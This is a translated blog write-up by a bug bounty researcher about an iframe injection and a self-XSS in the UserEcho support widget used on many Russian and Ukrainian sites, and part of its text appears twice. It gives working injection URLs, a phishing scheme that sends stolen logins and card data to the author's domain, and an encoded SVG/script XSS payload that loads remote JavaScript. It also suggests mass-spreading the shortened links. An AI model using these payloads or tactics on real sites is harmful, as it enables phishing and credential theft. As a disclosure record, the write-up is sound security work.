Iframe injection and self xss on more than 20,000 sites alexarank UA / RU
I am an independent security researcher securityz.net , the first place in the bug bounty of PrivatBank.
I decided to walk on top of alexarank , I began to look for vulnerabilities on gismeteo.ua (20th place). There was a redirect to the Russian version ( www.gismeteo.ru/soft/ ), drew attention to the technical support.
Technical support was located at gismeteo.userecho.com and downloaded to gismeteo in iframe:
Then a form appeared to create a ticket.
')
I tried to load my website into iframe https://gismeteo.userecho.com/s/interframe.html?url=https://securityz.net, but it did not load. Then I realized that in addition to the url of the download site, the variables lang, referer, xdm_e and others are also needed.
And my site was loaded in the frame.
Video:
It turned out that the owner of the widget userecho.com uses the same API on all client sites for technical support, hence the conclusion that all his clients are vulnerable to iframe injection.
We find a list of top clients - http://userecho.com/clients/?lang=en- and we understand that many vulnerable clients are the most visited sites:
- drugvokrug.ru (social network, more than 5 000 000 users),
- fl.ru (the most popular freelance exchange in Russia)
- easypay.ua (one of the most visited payment systems in Ukraine)
- tankionline.com
- ivi.ru
- amiro.ru
- okko.tv
- insales.ru
- a-lab.ru
- scrapinghub.com
- iridiummobile.net and many others.
Almost all sites place the userecho widget on their subdomain, an example is ask.drugvokrug.ru , but some place it as a subdomain on userecho kontur.userecho.com . Also userecho clients can be searched on google / yandex dorkam.
Attack vectors:
To spread a malicious link, you must first shorten the link goo.gl/GIYRUR, then:
It would be possible to send vulnerability messages to each vulnerable site, but the vulnerability would be promptly corrected by the userecho developers and I could not get anything from the vulnerable sites or from the widget developers.
Therefore, I decided to immediately inform the plug-in developers about the find.
01/09/2017 at 23:00: a bug report was sent in support of userecho.com.
01/10/2017 at 00:10: the vulnerability has been fixed and the vulnerable interframe.html file has been deleted (comment from the developers - the interframe.html file is no longer available (deleted) and all widgets work without it. Therefore, everything works with the same API.).
01/10/2017 at 02:14: developers paid a reward of $ 100. Comment:
I also found a SELF XSS vulnerability in userecho support and are not going to fix it, more than 20 thousand sites are vulnerable, here is the article and PoC.
I barely persuaded the developers to eliminate iframe injection:
+ Found another xss vulnerability in this widget, no one is going to fix it
and it is still present on 20,000+ sites.
To keep abreast of all my latest posts, follow Twitter at https://twitter.com/qiecew9w and vk. I would be very happy subscriptions.)
Successes!
I recommend reading my next article [BugBounty] Partial authentication bypass vk.com
I decided to walk on top of alexarank , I began to look for vulnerabilities on gismeteo.ua (20th place). There was a redirect to the Russian version ( www.gismeteo.ru/soft/ ), drew attention to the technical support.
Technical support was located at gismeteo.userecho.com and downloaded to gismeteo in iframe:
https://gismeteo.userecho.com/s/interframe.html?url=https://gismeteo.userecho.com/widget/forum/6-/?lang=ru&referer=https://www.gismeteo.ru/soft/&xdm_e=https://www.gismeteo.ru&xdm_c=default4178&xdm_p=1 Then a form appeared to create a ticket.
')
I tried to load my website into iframe https://gismeteo.userecho.com/s/interframe.html?url=https://securityz.net, but it did not load. Then I realized that in addition to the url of the download site, the variables lang, referer, xdm_e and others are also needed.
http://support.gismeteo.ru/s/interframe.html?url=https://securityz.net/?lang=ru&referer=https://www.gismeteo.ru/soft/&xdm_e=https://www.gismeteo.ru&xdm_c=default4178&xdm_p=1
And my site was loaded in the frame.
Video:
It turned out that the owner of the widget userecho.com uses the same API on all client sites for technical support, hence the conclusion that all his clients are vulnerable to iframe injection.
We find a list of top clients - http://userecho.com/clients/?lang=en- and we understand that many vulnerable clients are the most visited sites:
- drugvokrug.ru (social network, more than 5 000 000 users),
- fl.ru (the most popular freelance exchange in Russia)
- easypay.ua (one of the most visited payment systems in Ukraine)
- tankionline.com
- ivi.ru
- amiro.ru
- okko.tv
- insales.ru
- a-lab.ru
- scrapinghub.com
- iridiummobile.net and many others.
Almost all sites place the userecho widget on their subdomain, an example is ask.drugvokrug.ru , but some place it as a subdomain on userecho kontur.userecho.com . Also userecho clients can be searched on google / yandex dorkam.
Attack vectors:
- 1. Phishing - load your site, within which one into one is the same site as the original, and it can not be distinguished from the original, the victim enters his data and they come to me! (login, password, credit card numbers, cvv2 - easypay.ua and others).
Example: http://securityz.net/gismeteo.html?lang=ru&referer=https://www.gismeteo.ru/soft/&xdm_e=https://www.gismeteo.ru&xdm_c=default4178&xdm_p=1 - I made a copy of the site gismeteo and if the person enters the username and password on the gismeteo, they will come to me.
- 2. The introduction of advertising on the website iframe and it can be issued for advertising a vulnerable site.
Example: http://support.gismeteo.ru/s/interframe.html?url=https://securityz.net/?lang=ru&referer=https://www.gismeteo.ru/soft/&xdm_e=https:/ /www.gismeteo.ru&xdm_c=default4178&xdm_p=1
- 3. Run malicious code on the vulnerable site. You can of course run javascript on the vulnerable site, but not in the context of the domain (alert on my site):
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> "><script src=https://securityz.net/t.js?319304></script></script>/ svg + xml; base64, PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI + YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg ==" type = "image / svg + xml" AllowScriptAccess = "always"> </ EMBED><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> "><script src=https://securityz.net/t.js?319304></script></script>
To spread a malicious link, you must first shorten the link goo.gl/GIYRUR, then:
- Massively send to forums, to email addresses.
- Purposefully attack a specific user or admin using this vulnerability.
It would be possible to send vulnerability messages to each vulnerable site, but the vulnerability would be promptly corrected by the userecho developers and I could not get anything from the vulnerable sites or from the widget developers.
Therefore, I decided to immediately inform the plug-in developers about the find.
01/09/2017 at 23:00: a bug report was sent in support of userecho.com.
01/10/2017 at 00:10: the vulnerability has been fixed and the vulnerable interframe.html file has been deleted (comment from the developers - the interframe.html file is no longer available (deleted) and all widgets work without it. Therefore, everything works with the same API.).
01/10/2017 at 02:14: developers paid a reward of $ 100. Comment:
You must understand that we are not such a large company. In addition, it is generally the first time when we decided to give someone a monetary reward.
I also found a SELF XSS vulnerability in userecho support and are not going to fix it, more than 20 thousand sites are vulnerable, here is the article and PoC.
I barely persuaded the developers to eliminate iframe injection:
We saw from the logs that you played with interframe.html and basically understood why and how it was used. Only the option how to use it with benefit was not clear.
Since now we understand the use cases and you have prompted us to correct, we are ready to transfer you 100USD .
+ Found another xss vulnerability in this widget, no one is going to fix it
and it is still present on 20,000+ sites.
To keep abreast of all my latest posts, follow Twitter at https://twitter.com/qiecew9w and vk. I would be very happy subscriptions.)
Successes!
I recommend reading my next article [BugBounty] Partial authentication bypass vk.com
Source: https://habr.com/ru/post/319304/
All Articles